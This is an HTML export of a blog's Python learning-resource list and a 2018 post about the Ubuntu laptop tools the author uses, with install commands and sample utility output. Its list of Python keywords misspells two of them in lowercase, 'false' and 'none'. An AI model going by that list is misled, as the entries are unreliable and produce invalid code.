<a href="https://www.linuxtechi.com/learn-git-command-examples-linux-part-1/">Learn Git Command with Practical Examples on Linux – Part 1</a></div><div> <a href="https://github.com/CiscoDevNet/netprog_basics">Cisco DevNet GitHub Repo</a> - Great resources on setting up your laptop with Python, Git, Postman, etc.</div><div><a href="https://www.youtube.com/watch?v=RGOj5yH7evk">Git and GitHub for Beginners - Crash Course</a> - A really good video on git.<br />
<span style="background-color: #fcfcfa; color: #4e443c; font-family: "georgia" , "times new roman" , serif; font-size: 14px;"> <br /></span>
<br />
<span style="background-color: #fcfcfa; color: #4e443c; font-family: "georgia" , "times new roman" , serif; font-size: 14px;"><br /></span>
<br />
<h3>
Videos from Udemy.com </h3>
Udemy has inexpensive video training for Python, Linux, and a lot of other applications. These are on sale all the time for $9.99<br />
<br />
<ul>
<li>Python Network Programming - Part 1: Build 7 Python Apps</li>
<li>Complete Python Bootcamp: Go from zero to hero in Python 3</li><li>100 Days of Code - The Complete Python Pro Bootcamp for 2021</li>
</ul>
<h3>
</h3>
<h3>
Videos on Youtube</h3>
I find that I learn better when using books and websites but sometimes it's nice to watch a video.<br />
<br />Real python did a blog on the best Youtube channels for python<br />
<a href="https://realpython.com/python-youtube-channels/">The Ultimate List of Python YouTube Channels</a><br />
<br />
Subscribe to HackerSploit on Youtube and there is a complete series on Python. He uses 2.7 but it is still a good tutorial. They are really basic but I find Alexis entertaining.<br />
<a href="https://www.youtube.com/watch?v=5sqye64-1-k">Python For Ethical Hacking - #1 - Introduction & Python Modules</a><br />
<br /><a href="https://www.youtube.com/user/javaboynavin">Telusko Python for Beginners</a><br /><a href="https://www.youtube.com/watch?v=_uQrJ0TkZlc">Python Tutorial - Python for Beginners [Full Course] - Mosh</a> <br />
<a href="https://www.youtube.com/watch?v=rfscVS0vtbw">Learn Python - Full Course for Beginners [Tutorial] Free Code Camp</a></div><div><a href="https://www.youtube.com/watch?v=EyEqWFvLDT8">Python Tutorial For Beginners (With Notes) - Code with Harry</a></div><div><a href="https://www.youtube.com/watch?v=YYXdXT2l-Gg&list=PL-osiE80TeTt2d9bfVyTiXJA-UTHn6WwU">Python Tutorial for Beginners 1: Install and Setup for Mac and Windows - Corey Schafer</a></div><div><a href="https://www.youtube.com/c/PythonEngineer">Python Engineer</a></div><div><a href="https://twitter.com/bascodes/status/1533786031937441793">Writing Pythonic Code</a> - A Tweet thread by @Bascodes. He is worth following.<br /></div><div><a href="https://www.youtube.com/watch?v=BEP4q0Cno98">A Beginner's Guide to CI/CD Pipeline Network Automation with Docker, Github and Python</a><br /></div><div><br /></div><h4 style="text-align: left;">Corey Shafer Videos</h4><div>I recommend that you subscribe to this channel. Here are four of his videos that I found very useful</div><div><br /></div><div><a href="https://youtu.be/tb8gHvYlCFs">Requests Tutorial</a> - The requests library is used to pull data down from webservers</div><div><a href="https://youtu.be/9N6a-VLBa2I">JSON Tutorial</a> - Java Script Object Notation is a common data format used by APIs</div><div><a href="https://youtu.be/D3JvDWO-BY4">Sorting Tutorial</a> - Sorting routines for lists and dictionaries</div><div><a href="https://youtu.be/3dt4OGnU5sM">List Comprehensions</a> - Working with list comprehensions<br />
<h3>
e-books from Amazon </h3>
I love the Kindle app on my laptop, phone and iPad. If I get stuck in a long line I just open it up and do some studying! These were all under $5. You can go to Amazon, set filter to Kindle store and enter "python programming free book" and find a lot of free books.<br />
<br />
<ul>
<li>Learn Python in One Day and Learn It Well Python for Beginners with Hands-on Project The only book you need to start coding in Python immediately By Jamie Chan</li>
<li>Python Tips and Tricks: Learn the Best Tips and Tricks to Get The Most out of Python NOW! Jones, Daniel</li>
<li>The Fundamentals Of Python Programming: A Complete Beginners Guide To Python Mastery.</li>
<li>Python Programming Tips and Tricks: The Ultimate Cheat Sheet for Python Programming. 20+ Tips and Tricks to Make Your Life Easier and More Efficient</li>
<li>Automate the Boring Stuff with Python: Practical Programming for Total Beginners</li>
</ul>
<br />
<div>
<br /></div>
<h3>
Websites</h3>
<div>
There are so many python websites it would be impossible to list them all, here are a few I have found very useful:</div>
<div><br /></div><h4 style="text-align: left;">Getting Started</h4>
<ul>
<li><a href="http://realpython.com/">realpython.com</a> - A great site for learning python. You can sign up for a weekly tip that is emailed. They also have a lot of tutorials that are very good.</li><li><a href="https://realpython.com/python-print/">Real Python Your Guide to the Python print() Function</a> - Includes using f strings. Very good tutorial.<br /></li>
<li><a href="http://realpython.com/start-here/">realpython.com/start-here/</a> - This page has a lot of getting started tips.</li>
<li><a href="http://realpython.com/products/real-python-course/#course-packages">realpython.com/products/real-python-course/#course-packages</a> - This is a $60 course that looks pretty comprehensive. I didn't take it but everything else from real python has been good.</li><li><a href="https://www.tutorialspoint.com/python3">Tutorials Point</a> - Python 3 tutorials</li><li><a href="https://www.practicepython.org">Python Practice website</a> - A free site with practice problems and solutions.</li><li><a href="http://www.pythonforbeginners.com/">Python for Beginners</a></li><li><a href="https://www.geeksforgeeks.org/">Geeks for Geeks</a> - A computer science portal for geeks. Search for python.</li><li><a href="https://boostlog.io/@bily809/what-i-did-to-learn-python-5b2368b844deba00540467e5">What I did to learn Python</a></li><li><a href="https://blog.finxter.com">Finxter Python Courses</a> - This site has training and if you register free cheat sheets.</li><li><a href="https://jakevdp.github.io/WhirlwindTourOfPython/02-basic-python-syntax.html">A Quick Tour of Python Language Syntax</a> - <span face=""Source Sans Pro", sans-serif" style="box-sizing: border-box; caret-color: rgb(34, 34, 34); color: #222222; font-size: 15px; text-size-adjust: auto;">by Jake VanderPlas. Much more on this site.</span></li><li><span face=""Source Sans Pro", sans-serif" style="box-sizing: border-box; caret-color: rgb(34, 34, 34); color: #222222; font-size: 15px; text-size-adjust: auto;"><a href="https://jakevdp.github.io/WhirlwindTourOfPython/14-strings-and-regular-expressions.html">String Manipulation and Regular Expressions</a>- <span style="box-sizing: border-box; text-size-adjust: auto;">by Jake VanderPlas. Much more on this site.</span></span></li><li><a href="https://stackoverflow.com/">Stack Overflow</a> - A site dedicated to programming questions</li><li><a href="https://levelup.gitconnected.com/17-killer-github-repos-you-need-to-save-right-now-3d2a8d694837">17 Killer GitHub Repos You Need to Save Right Now!</a> - Not 100% python, but a lot of resources.<br /></li></ul><h4 style="text-align: left;">General Tips</h4><ul>
<li><a href="https://www.codegrepper.com/code-examples/python/pass+variable+in+subprocess+run+python">Grepper</a> - An awesome collection of code. They have a Chrome extension that captures code searches and displays ranked results. Pretty cool.</li>
<li><a href="https://pymotw.com/3/">Python 3 Module of the Week</a> - A site with a ton of examples of how to do things in python. There is a good tutorial on the IP Address libraries.</li><li><a href="https://docs.python.org/3/library/functions.html">Python Built In Functions</a><br /></li>
<li><a href="https://sadh.life/post/builtins/">Understanding all of Python, through its builtins</a></li>
<li><a href="http://blog.lerner.co.il/python-parentheses-primer/">Python parentheses primer</a></li>
<li><a href="https://www.pyimagesearch.com/2018/03/12/python-argparse-command-line-arguments/">Python, argparse, and command line arguments</a></li>
<li><a href="https://github.com/secondtonone1/python-/blob/master/envs/lsbaws/Lib/site-packages/pip/_vendor/requests/utils.py">Python Utilities</a></li><li><a href="https://realpython.com/reverse-string-python/">Reverse Strings in Python: reversed(), Slicing, and More</a><br /></li>
<li><a href="https://www.debuggex.com/cheatsheet/regex/python">Python Regex Cheatsheet</a></li>
<li><a href="https://www.dataquest.io/blog/large_files/python-regular-expressions-cheat-sheet.pdf">Data Science Cheat Sheet</a> - Python Regular Expressions</li>
<li><a href="https://github.com/ActiveState/code">ActiveState Code Recipes</a> - Welcome to the ActiveState code recipes repo! We have migrated all of the great content from code.activestate.com to its new forever-home here at GitHub. This makes it easier for everyone to submit new recipes, contribute code and integrate all the great information into their own projects.</li><li><a href="https://python.plainenglish.io/10-python-scripts-to-automate-your-daily-problems-936cdbf1bd82">10 Python Scripts to Automate Your Daily Problems</a><br /></li><li><a href="https://testdriven.io/blog/documenting-python/">Documenting Python Code and Projects</a><br /></li></ul><h4 style="text-align: left;">Jinja Templates</h4><div><ul style="text-align: left;"><li><a href="https://jinja.palletsprojects.com/en/3.1.x/templates/#synopsis">Template Designer Documentation</a> - Jinja is a templating language that you can use with Python</li><li><a href="https://pyneng.readthedocs.io/en/latest/book/20_jinja2/syntax_if.html">Python for Network Engineers Jinja tutorial</a></li><li><a href="https://jinja.palletsprojects.com/en/3.0.x/tricks/">Tips and Tricks</a></li><li><a href="https://pyneng.readthedocs.io/en/latest/book/20_jinja2/README.html">Getting started with Jinja2</a></li><li><a href="https://jinja.palletsprojects.com/en/3.0.x/templates/#list-of-control-structures">List of Control Structures</a></li><li><a href="https://github.com/qn7o/jinja2-live-parser">jinja2-live-parser</a></li><li><a href="https://jinja.palletsprojects.com/en/3.0.x/">Pallet Projects Jinja Tutorial</a></li><li><a href="https://pyneng.readthedocs.io/en/latest/book/20_jinja2/index.html">Jinja2 configuration templates</a> - Python for Network Engineers</li></ul></div><h4 style="text-align: left;">Network Engineering</h4><ul>
<li><a href="https://github.com/rikosintie">Hubbard On Networking GitHub Repo</a><br /></li><li><a href="https://pynet.twb-tech.com/blog/automation/netmiko.html">Python for Network Engineers</a> - The name says it all! Kirk Byers wrote the netmiko python libray to automate network device operations.</li>
<li><a href="https://github.com/ktbyers/netmiko/releases">Netmiko Github</a> - The github repository for netmiko python library</li>
<li><a href="https://learninglabs.cisco.com/labs/tags/Python">Cisco Devnet site</a> - The learning labs part of DevNet. Great training videos. You can use a Cisco account or create a free account.</li>
<li><a href="http://njrusmc.net/pub/etech.pdf">Cisco DevNet Evolving Technologies Study Guide</a> - Nick Russo's guide<br /></li><li><a href="https://www.batfish.org">Batfish</a> - An Open Source network configuration analysis tool<br /></li><li><a href="https://github.com/frostbits-security/ccat">Cisco Config Analysis Tool</a> - A python tool that takes a Cisco running config and compares it to the Cisco best practices guide.</li><li><a href="https://realpython.com/primer-on-jinja-templating/">Primer on Jinja Templating</a> - Jinja templates can be used to create config files from Excel data.<br /></li><li><a href="https://learning.postman.com/docs/postman/launching-postman/introduction/ ">Welcome to the Postman docs!</a> - Postman is a tool used to interact with RESTful API. <br /></li><li><a href="https://setscholars.net/reading-and-writing-csv-files-in-python/">Reading and Writing CSV Files in Python</a><br /></li><li><a href="https://pyneng.readthedocs.io/en/latest/book/21_textfsm/README.html">Getting started with TextFSM</a><br /></li><li><a href="https://pyneng.readthedocs.io/en/latest/book/20_jinja2/example.html">Example of using Jinja</a> - Python for Network Engineers<br /></li></ul><h4 style="text-align: left;">Debugging</h4><ul><li><a href="https://www.tutorialspoint.com/python3/python_exceptions.htm">Python 3 - Exceptions Handling</a><br /></li><li><a href="https://www.geeksforgeeks.org/python-try-except/">Python Try Except Else Finally error handling</a><br /></li><li><a href="https://adamj.eu/tech/2021/10/08/tips-for-debugging-with-print/">Tips for debugging with print()</a></li>
</ul>
<h4 style="text-align: left;">Web Development</h4><div><ul style="text-align: left;"><li><a href="https://twitter.com/heyOnuoha/status/1476112706629517316">Twitter University is Free!</a> - You can learn 98% of web development by reading these 10 threads</li><li><a href="https://web-dev-resources.com/#/">Awesome Web Development Resources</a> - Not specifically Python but has a lot of great resources</li><li><a href="https://pythoncourses.gumroad.com/l/IMzBy">Create Web Apps with Python Flask</a><br /></li></ul></div><h4 style="text-align: left;"><br /></h4><h4 style="text-align: left;">Style guides</h4><div>Python is a structured language that uses white space as part of the structure. But you can still create ugly code. The official Python style guide is part of the Python Enhancement Proposals (PEPs) which are documents that provide guidance and spell out best practices for how Python code should be organized, packaged, released, deprecated, and so on. PEP8 is a popular standard for styling Python code and is extensively used in the developer community. </div><div><ul><li><a href="https://peps.python.org/pep-0008/">PEP 8 – Style Guide for Python Code</a> - The official style guide for Python</li><li><a href="https://realpython.com/python-pep8/">How to Write Beautiful Python Code With PEP 8</a> - Real Python PEP8 Tutorial<br /></li><li><a href="https://realpython.com/documenting-python-code/">Documenting Python Code: A Complete Guide</a></li></ul></div><h4 style="text-align: left;">Python Virtual Environments</h4></div><div>As you start learning and creating more python tools you will want to start using virtual environments. These two blogs will teach you what you need to know. There are a lot more blogs available on the Internet.</div><div style="text-align: left;"><br /><ul style="text-align: left;"><li><a href="https://realpython.com/python-virtual-environments-a-primer/">Python Virtual Environments: A Primer</a></li><li><a href="https://realpython.com/intro-to-pyenv/#specifying-your-python-version">Managing Multiple Python Versions With pyenv</a></li><li><a href="https://testdriven.io/blog/python-environments/">Modern Python Environments - dependency and workspace management</a></li></ul></div><div>
<br />
<h3>
Podcasts</h3>
You probably won't learn much coding from a podcast but these are very interesting to listen to. I find a lot of good links in the show notes. For example, I learned about Thonny, MU, and Visual Studio Code from podcasts.<br />
<a href="https://talkpython.fm/">Talk Python To Me</a> - A good podcast that covers a lot of topics. There will be one called "Teaching Python to network engineers" in August, 2018!<br />
<a href="https://www.podcastinit.com/">Podcast.__init__</a> - A podcast about Python and the people who make it great. Hosted by Tobias Macey.<br />
<a href="https://pythonbytes.fm/">Python Bytes</a> - Python Bytes podcast delivers headlines directly to your earbuds. If you want to stay up on the Python developer news but don’t have time to scour Reddit, Twitter, and other news sources, just subscribe and you’ll get the best picks delivered weekly.<br />
<br />
<h3>
Keywords In Python</h3>
There are 33 keywords that should never be used as a variable, function name, class, object, or as any other identifiers in your programs.<br />
<br />
false<br />
True<br />
finally<br />
class<br />
for<br />
continue<br /> none<br />
return<br />
lambda<br />
try<br />
is<br />
def<br />
from<br />
nonlocal<br />
while<br />
and<br />
not<br />
global<br />
del<br />
with<br />
as<br />
elif<br />
if<br />
or<br />
yield<br />
break<br />
import<br />
except<br />
pass<br />
assert<br />
else<br />
raise<br />
in</div></div></div><div><br /></div><h4 style="text-align: left;">Libraries</h4><div><a href="https://pint.readthedocs.io/en/stable/">Pint</a> - Pint is a Python package to define, operate and manipulate physical quantities</div><div><br /></div>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com2tag:blogger.com,1999:blog-690329124282786689.post-9095644133700094942018-05-02T12:42:00.000-07:002018-09-21T20:41:58.504-07:00The tools on my Ubuntu 18.04 laptop<div>
Update September 15, 2018: Ubuntu 18.04 has support for Snaps and Flatpaks. What are these? A new method for installing applications where everythimg is bundled into the package so you don’t have to deal with dependencies. I haven’t used Flatpaks yet but Snaps are great! You go to https://snapcraft.io/store and find the app you want. Then you click a button, copy the link and paste it into a terminal.</div>
<div>
<br /></div>
<div>
So far I have used snaps for:</div>
<ul>
<li>Brave - A new browser that is much more privacy respecting than Chrome</li>
<li>Corebird - A nice Twitter app</li>
<li>fKill - Fabulously kill processes</li>
<li>GHex - A graphical Hex editor from Canonical </li>
<li>Hiri - A Microsoft Exchange/Office 365</li>
<li>Hollywood - Fill your console with Hollywood melodrama technobabble </li>
<li>KeepasXC - My preferred Keepas client</li>
<li>Mailspring - A lretty good mail client for IMAP servers. I’m using it for gmail </li>
<li>Mumble - An open source voice chat client that is popular in Linux circles</li>
<li>Notepadqq - A notepad++ like editor for Linux</li>
<li>Powershell - Microsofts Opensource version of Powershel</li>
<li>Skype</li>
<li>Slack- The official Slack client</li>
<li>Speedy Duplicate Finder - Blazingly fast duplicate finder for Windows, Mac and Linux</li>
<li>Telegram - Official desktop client </li>
<li>Termius - A cross platform SSH client. I use it on IOS when I just need to make a few changes and don’t want to carry a laptop.</li>
</ul>
<div>
******************************************************************************</div>
<div>
<br /></div>
After the 2016 Southern California Linux Expo (SCALE15) I purchased a <a href="http://system76.com/" target="_blank">System76</a> Gazelle laptop. System76 sells laptop and desktops designed for Linux so there are no issues with drivers or hardware incompatibility.<br />
<br />
I was thinking about buying a new Macbook to replace my aging Macbook Air but Apple dropped all ports except USB-C and that was just unacceptable for my work. Unlike the Macbook, the Gazelle has VGA, HDMI, three USB3-A, one USB2-A, Ethernet, and a full-size SD card slot.<br />
<br />
Plus, System76 laptops are as open as you can get! I purchased it with 8GB of RAM and a 250GB spinning disk. Not long after, I decided to go to 16GB of RAM and an m.2 NVME drive (The new Gazelle supports 32GB of RAM!). How hard was it? Removed a few screws, popped off the cover, added one 8GB stick, plugged in the NVME and reinstalled the cover.<br />
<br />
I contacted System76 beforehand and they told me to buy the drive and RAM from Amazon because it would be less expensive than buying from them!!! That is great customer service.<br />
<br />
I think the build quality is pretty good, I recently knocked it off the top of a 6-foot ladder. It was open at the time, the floor was concrete with a thin carpet. I didn't want to look at it. I was sure the LCD would be broken and there would be other damage. But it's been a week and I haven't noticed any damage, it's still working.<br />
<br />
So, how hard was it switching from Windows/MAC to Linux? Not much of a challenge actually. The Ubuntu 16.04 desktop uses the Super key (Windows key if you are on a Dell/Lenovo that you converted to Linux) to open up the search tool just like Windows. The file explorer, Nautilus, is very similar to Explorer in Window or finder in OSX.<br />
<br />
What I am loving about Linux is no tracking of what I am doing, lots of free open source tools and updates happen almost daily. Updates seldom require a reboot and a typical update takes a few minutes, and if you do need to reboot there isn't a long delay with a message not to power off while the system is reconfigured.<br />
<br />
I updated to Ubuntu 18.04 the week it came out. Normally I would do a nuke and pave because it’s so easy in Ubuntu. Most of the configuration data for the apps is in your home folder so you back it up, nuke/pave and put the home folder back. But I hadn’t been running 17.04 very long and just did an in place upgrade. It went off without any drama and now I’m using the Gnome desktop.<br />
<div>
<br /></div>
<div>
Ubuntu has decided to drop the Unity desktop and standardize on Gnome. I am loving 18.04, the Gnome desktop has been easy to transition to and 18.04 lets you setup the live update feature so kernel updates are automatic and you can postpone a reboot if one is needed. I installed the following Gnome extensions to replace functionality lost in the switch to Gnome:</div>
<div>
<br />
<div>
<div>
Learning Linux</div>
<div>
<div>
<div>
There are so many Linux sites with free tutorials and a lot of Kindle books for $.99 to $2.99. I had no problem finding answers to questions I had. Also, it seems that the old RTFM response om forums has gone away, I didn't get flamed anywhere! I purchased the Linux Professional Institute’s cert guide and took the Linux Essentials test. It’s not a system engineer level but I’m comfortable with the OS now.<br />
<div>
<br /></div>
<div>
I found the following podcasts for Linux and they have really helped my transition:</div>
<div>
<ul>
<li>Linux Unplugged</li>
<li>The Ask Noah show</li>
<li>Ubuntu podcast</li>
<li>Linux in the ham shack</li>
<li>Late Night Linux</li>
<li>Linux Action News</li>
<li>Destination Linux</li>
</ul>
</div>
<div>
<br />
The network stack on Linux is much better than Windows. You can create multiple network profiles and use them as needed. For example, I have a profile named Eth-DHCP that uses DHCP and one called Eth-con1 that uses static addressing.<br />
<br />
It's easy to change the static settings and then just click it to use it. Another small advantage is that the boxes for IP, Mask, Gateway allow pasting. You don't have to type one octet, tab, next octet, tab, etc. And the gateway can be /24 or whatever you need.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbV9bHJK4_3BnYCsWRHCmNPGb4-qo0JKQDwhqQupm3lA1YXaFtO2uVBxPLNCd6H80Hab7w-GNCadbFGd5vQChGAWxpOgEFjzGixVC0vIhDk75jDQotIF9zg8aBI63HUI_xxDe7iIbRGD1D/s1600/Eth-Conn1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="536" data-original-width="577" height="371" id="id_4b3a_81bd_c925_b5db" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbV9bHJK4_3BnYCsWRHCmNPGb4-qo0JKQDwhqQupm3lA1YXaFtO2uVBxPLNCd6H80Hab7w-GNCadbFGd5vQChGAWxpOgEFjzGixVC0vIhDk75jDQotIF9zg8aBI63HUI_xxDe7iIbRGD1D/s400/Eth-Conn1.png" style="height: auto; width: 400px;" width="400" /></a></div>
<br />
<br />
Not earth-shattering, but if you change networks a lot it's more convenient. Plus, I haven't had issues changing networks many times per day. The stack just seems to work. It is much easier to query networks status than it is on Windows.<br />
<br />
The tools iwlist, nm-tool, nmcli and ip let you quickly see what channels your wifi card supports, what SSIDs are available, what interfaces are up, the IP addresses, etc. This blog isn't going to go into how to use them but I do have a blog on some uses for the tools <a href="https://mwhubbard.blogspot.com/search?q=iwlist" target="_blank">here</a>.<br />
<br />
Finally, you can do monitor mode captures without a special adapter like a Riverbed AirPcap. If you do a lot of wireless troubleshooting this is a big advantage.<br />
<br />
<h3>
The Tools</h3>
The great thing about Linux is all of the built-in and free open source networking tools.<br />
<br />
<h4>
Tools from the Ubuntu software store</h4>
Network Tools (gnome)- Graphical tool for ping, ifconfig, netstat, etc.<br />
<br />
simplenote - free tool similar to Evernote.<br />
<br />
PERL auto connect - SSH/RDP client. Install PAC-VS from the Ubuntu software store. This tool is really nice, you have RDP, SSH, Telnet all in one interface.<br />
<br />
KeepassXC - A cross platform password manager. Supports Yubikey and other forms of two factor authentication.<br />
<br />
unetbootin - Tool for creating live USB drives<br />
<br />
FSLint - is a utility to find and clean various forms of lint on a filesystem, especially duplicate files and broken symlinks.<br />
<br />
Disk Usage Analyzer - Similar to WinDirStat on windows. It's built into Ubuntu.<br />
<br />
brasero - CD/DVD burner. I know, but my Gazelle has a DVD burner and occasionally I need to burn an archive.<br />
<br />
cheese webcam - I use this with my Ebay.com endoscope for looking into tight spaces. An interesting story, I bought the scope and it said Windows only. I figured I would use it with my Windows VM.<br />
<br />
When it came in it had a small CD with all Chinese on it. I used ClamAV to scan it and ClamAV found a virus. I plugged the Endoscope into the Gazelle and did an lsusb (list USB). It listed the endoscope and the hardware manufacturer. I did a quick Google and found an AskUbuntu.com post saying it is supported by the built-in Cheese webcam! No windows needed.<br />
<br />
FBReader - eBook reader.<br />
<br />
bleachbit - You too can be like Hillary.<br />
<br />
Meld - A cross-platform file compare utility. I like it a lot better than notepad++ with the compare plugin<br />
<br />
ClamTK - Graphical frontend for ClamAV.<br />
<br />
shutter - A screenshot tool with rectangles, lines, etc. I have used the Windows Snipping tool for years and really like it. Shutter is even better. It can be used like MS Paint.net<br />
<br />
etcher - A live usb tool. This tool is highly recommended in the Raspberry Pi and SoC communities.<br />
<br />
smemstat - snap package memory tool.<br />
<br />
Gnome Hex Editor - Inspect and edit binary files.<br />
<br />
Remmina - Remote Desktop tool built into Ubuntu. Works great.<br />
<h4>
Tools installed from the terminal </h4>
<div>
Arpscan - A great tool from Roy Hill. Allows you to find devices that don’t respond to ping and much more. I wrote a Python wrapper for Arpscan. It’s on my github at <a href="https://github.com/rikosintie">https://github.com/rikosintie</a></div>
<div>
<a href="https://github.com/royhills/arp-scan">https://github.com/royhills/arp-scan</a></div>
<div>
<br />
Gnome Sushi file preview - Allows you to select a file in the file manager (Nautilus) and just press the spacebar to preview it. Install instructions are here - <a href="https://www.howtogeek.com/277987/how-to-quickly-preview-a-file-in-ubuntus-file-manager-like-quick-look-in-macos/">How to Geek</a><br />
<br /></div>
Docker - https://www.docker.com/community-edition<br />
<br />
Clam AV - I use this to scan windows files before inserting a flash drive or running something on windows. Install from the synaptic package manager.<br />
<br />
Python 2.7 - A fresh install of 18.04 doesn’t include Python 2.7, 3.x is now the default. </div>
<div>
<br /></div>
<div>
Microsoft Visual Studio Code - A great open source IDE. Supports Python, Powershell and just about every other programming language.</div>
<div>
<a href="https://code.visualstudio.com/">https://code.visualstudio.com/</a></div>
<div>
<br /></div>
<div>
Microsoft Powershell Core - For those times when you need to pop a windows box but don’t want to fire up a Windows VM! Microsoft released PS Core as an open source project. I have to admit, it’s pretty convenient having Powershell native on Linux. </div>
<div>
<a href="https://blogs.msdn.microsoft.com/powershell/2018/01/10/powershell-core-6-0-generally-available-ga-and-supported/">https://blogs.msdn.microsoft.com/powershell/2018/01/10/powershell-core-6-0-generally-available-ga-and-supported/</a><br />
<br />
FoxtrotGPS - I use this with my external USB GPS when I run wigle.net or want to track my trip on my laptop.<br />
<br />
Sublime Text - $75.00 text editor. Has great support for Python. The site realpython.com sells a packege<br />
<br />
sudo apt install minicom - Serial terminal emulator for use with USB to Serial adapters. It runs in the Linux terminal so it's very convenient.<br />
<br />
sudo apt install smem - memory display tool<br />
<br />
sudo apt-get install xsltproc - xml to html converter<br />
<br />
sudo apt install traceroute - This is a legacy tool but I still like it.<br />
<br />
sudo apt install gcc python-dev python-pip - Python installer and c compiler<br />
<br />
sudo apt-get install xclip - copies files to the clipboard Ex. xclip -sel clip < ~/.ssh/id_rsa.pub<br />
<br />
Hex editor - https://github.com/krpors/hx<br />
<br />
Solaar - sudo apt install solaar - A tool for Logitech unify receivers.<br />
https://github.com/pwr/Solaar<br />
<br />
sudo apt install snmp - Allows you to run all the snmpget, snmpwalk, etc. tools<br />
<br />
sudo apt install linssid - A tool similar to inSSIDer<br />
<br />
sudo apt install aircrack-ng - Put wireless card into monitor mode.<br />
<br />
sudo apt install apt-show-versions<br />
<br />
https://www.insynchq.com/ - Google Drive sync tool.<br />
<br />
Progress - Linux tool to show progress for cp, mv, dd, ... (formerly known as cv)<br />
https://github.com/Xfennec/progress<br />
<br />
sudo apt install apt-file - a software package that indexes the contents of packages in your available repositories and allows you to search for a particular file among all available packages.<br />
<br />
sudo apt install cryptsetup - manage plain dm-crypt and LUKS encrypted volumes<br />
<br />
sudo apt install procinfo - lsdev is installed with this.<br />
<br />
<div>
sudo apt-get install network-manager-vpnc-gnome (Cisco VPN)<br />
<br /></div>
sudo apt install htop - an ncurses replacement for top. Has sorting capability.<br />
<br />
sudo apt-get install joe - a super fast cli text editor. It can open and work with huge files. I use it for my password cracking dictionary files.<br />
<br />
**************************************************<br />
IP Address calculator - Simple terminal program. Works great!<br />
sudo apt install sipcalc<br />
<br />
Example:<br />
<span style="font-family: "courier new" , "courier" , monospace;">sipcalc 10.34.208.0/20</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">-[ipv4 : 10.34.208.0/20] - 0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">[CIDR]</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Host address<span style="white-space: pre;"> </span>- 10.34.208.0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Host address (decimal)<span style="white-space: pre;"> </span>- <a dir="ltr" href="tel:170053632" x-apple-data-detectors-result="10" x-apple-data-detectors-type="telephone" x-apple-data-detectors="true">170053632</a></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Host address (hex)<span style="white-space: pre;"> </span>- A22D000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Network address<span style="white-space: pre;"> </span>- 10.34.208.0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Network mask<span style="white-space: pre;"> </span>- 255.255.240.0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Network mask (bits)<span style="white-space: pre;"> </span>- 20</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Network mask (hex)<span style="white-space: pre;"> </span>- FFFFF000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Broadcast address<span style="white-space: pre;"> </span>- 10.34.223.255</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Cisco wildcard<span style="white-space: pre;"> </span>- 0.0.15.255</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Addresses in network<span style="white-space: pre;"> </span>- 4096</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Network range<span style="white-space: pre;"> </span>- 10.34.208.0 - 10.34.223.255</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Usable range<span style="white-space: pre;"> </span>- 10.34.208.1 - 10.34.223.254</span><br />
<div>
<br />
*************************************************</div>
Tool to locate files in the file system.<br />
sudo apt install mlocate<br />
<br />
run sudo updatedb after installing locate. It sets up the database and indexes all package files.<br />
<br />
**************************************************<br />
Moreutils - A small package with several useful utilities. See this page for more.<br />
https://rentes.github.io/unix/utilities/2015/07/27/moreutils-package/#installing<br />
sudo apt install moreutils<br />
<br />
**************************************************<br />
INXI is a great system information tool<br />
https://github.com/smxi/inxi<br />
sudo apt install inxi - inxi is a full featured CLI system information tool.<br />
inxi -F -x -c13 -- all output with extra data<br />
inxi -F -xx -c13 -- all output with extra, extra data<br />
inxi -B -- Battery info<br />
inxi -c13 -- use black output<br />
inxi -C -- CPU information<br />
inxi -D -- hard drive info<br />
inxi -f -- all cpu flags<br />
inxi -G -- graphics card info<br />
inxi -i -- network interface info<br />
inxi -I -- processes, uptime, memory, inxi version,<br />
sudo inxi -m -c13 - list memory<br />
<br />
********************************************************<br />
LLDP client for Linux.<br />
sudo apt-get install lldpd<br />
sudo service lldpd restart<br />
https://fnord.no/2016/04/28/lldp-on-linux/<br />
Usage<br />
lldpcli show neighbors<br />
<br />
********************************************************<br />
ssh-audit - A simple tool to pull down the crypto ciphers that an SSH server offers.<br />
https://github.com/arthepsy/ssh-audit<br />
usage: ssh-audit.py [-1246pbnvl] <host><br /><br />-1, --ssh1 force ssh version 1 only<br />-2, --ssh2 force ssh version 2 only<br />-4, --ipv4 enable IPv4 (order of precedence)<br />-6, --ipv6 enable IPv6 (order of precedence)<br />-p, --port=<port> port to connect<br />-b, --batch batch output<br />-n, --no-colors disable colors<br />-v, --verbose verbose output<br />-l, --level=<level> minimum output level (info|warn|fail)<br /><br />./ssh-audit.py 192.168.10.181<br /><br />********************************************************<br />I-NEX - I-Nex is an application that gathers information for hardware components available on your system and displays it using an user interface similar to the popular Windows tool CPU-Z.</level></port></host><br />
<host><port><level>http://i-nex.linux.pl/install/</level></port></host><br />
